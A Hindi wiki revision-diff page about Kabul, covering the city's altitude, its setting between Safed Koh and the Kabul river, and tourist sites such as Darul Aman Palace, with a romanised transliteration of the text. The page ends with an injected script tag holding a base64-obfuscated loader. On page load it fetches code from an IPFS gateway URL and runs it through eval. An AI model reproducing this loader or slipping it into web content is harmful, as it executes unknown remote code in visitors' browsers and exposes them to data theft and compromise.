Difference between revisions of "काबुल"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('*काबुल अफ़ग़ानिस्‍तान का सबसे बड़ा शहर और राजधानी ...' के साथ नया पन्ना बनाया)
 
 
(3 intermediate revisions by one other user not shown)
Line 1: Line 1:
*काबुल [[अफ़ग़ानिस्‍तान]] का सबसे बड़ा शहर और राजधानी है।  
+
[[चित्र:Qargha-Lake-Kabul.jpg|thumb|250px|करघा झील, क़ाबुल]]
*यह अफ़ग़ानिस्‍तान का आर्थिक और सांस्‍कृतिक केंद्र भी है।  
+
'''काबुल''' ([[अंग्रेज़ी]]:''Kabul'') [[अफ़ग़ानिस्तान]] का सबसे बड़ा शहर और राजधानी है। यह अफ़ग़ानिस्‍तान का आर्थिक और सांस्‍कृतिक केंद्र भी है।
*यह शहर समुद्र तल से 1800 मीटर की ऊँचाई पर स्थित है।  
+
 
*काबुल सफेद खो पहाड़ी और काबुल नदी के बीच बसा हुआ है।  
+
*काबुल शहर [[समुद्र]] तल से 1800 मीटर की ऊँचाई पर स्थित है।  
*यह पर्यटन की दृष्‍िट से मध्‍य एशिया का एक महत्‍पपूर्ण केंद्र माना जाता है।  
+
*[[सफ़ेद कोह|सफ़ेद कोह पहाड़ी]] और [[क़ाबुल नदी]] के बीच काबुल शहर बसा हुआ है।  
*यहाँ कई प्रमुख पर्यटन स्‍थल हैं।
+
*इस शहर को पर्यटन की दृष्टि से मध्‍य एशिया का एक महत्‍पपूर्ण केंद्र माना जाता है।  
*जिसमें अफ़ग़ान नेशनल म्‍यूजियम, दारुल अमन पैलेस, बाग-ए-बाबर, ईदगाह मस्जिद, ओमर माइन म्‍यूजियम यहाँ के प्रमुख दर्शनीय स्‍थल है।
+
*यहाँ कई प्रमुख पर्यटन स्‍थल हैं, जिसमें 'अफ़ग़ान नेशनल म्‍यूजियम', 'दारुल अमन पैलेस', '[[बाग़-ए-बाबर]]', 'ईदगाह मस्जिद', 'ओमर माइन म्‍यूजियम' आदि प्रमुख दर्शनीय स्‍थल है।
 +
 
 +
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 +
==वीथिका==
 +
<gallery>
 +
चित्र:Darul-Aman-Palace.jpg|दारुल अमन पैलेस, काबुल
 +
चित्र:Babur-Gardens.jpg|बाग-ए-बाबर, काबुल
 +
चित्र:Haji-Abdul-Rahman-Mosque.jpg|हाजी अब्दुल रहमान मस्जिद, काबुल
 +
</gallery>
 +
==संबंधित लेख==
 +
{{विदेशी स्थान}}
 +
[[Category:विदेशी स्थान]][[Category:विदेशी नगर]][[Category:ऐतिहासिक स्थान कोश]][[Category:पर्यटन कोश]][[Category:इतिहास कोश]] 
 +
__INDEX__

Latest revision as of 12:19, 6 December 2017

thumb|250px|karagha jhil, qabul kabul (aangrezi:Kabul) afaganistan ka sabase b da shahar aur rajadhani hai. yah afaganish‍tan ka arthik aur saansh‍kritik keandr bhi hai.

  • kabul shahar samudr tal se 1800 mitar ki ooanchaee par sthit hai.
  • safed koh paha di aur qabul nadi ke bich kabul shahar basa hua hai.
  • is shahar ko paryatan ki drishti se madhh‍y eshiya ka ek mahath‍papoorn keandr mana jata hai.
  • yahaan kee pramukh paryatan sh‍thal haian, jisamean 'afagan neshanal mh‍yoojiyam', 'darul aman pailes', 'bag-e-babar', 'eedagah masjid', 'omar main mh‍yoojiyam' adi pramukh darshaniy sh‍thal hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

vithika

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>